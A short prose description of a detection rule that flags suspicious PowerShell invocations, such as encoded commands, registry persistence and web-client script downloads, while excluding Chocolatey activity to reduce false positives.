This threat detection rule aims at identifying suspicious PowerShell command invocations that may indicate malicious activity. It focuses on various patterns in the PowerShell command context, including the use of specific parameters and invocation techniques that are commonly associated with exploitation and evasion tactics. The rule detects indicators from different contexts such as base64 encoded commands, invocation of certain object creation methods, additions to the Windows registry for persistence, and the use of web clients for downloading scripts. The rule incorporates a filtering mechanism to exclude known benign operations associated with Chocolatey, a popular package manager for Windows, thus reducing false positives. Overall, by analyzing the ContextInfo for signs of suspicious PowerShell usage while distinguishing it from approved activities, this rule plays a crucial role in mitigating the risk of malicious PowerShell exploits in a Windows environment.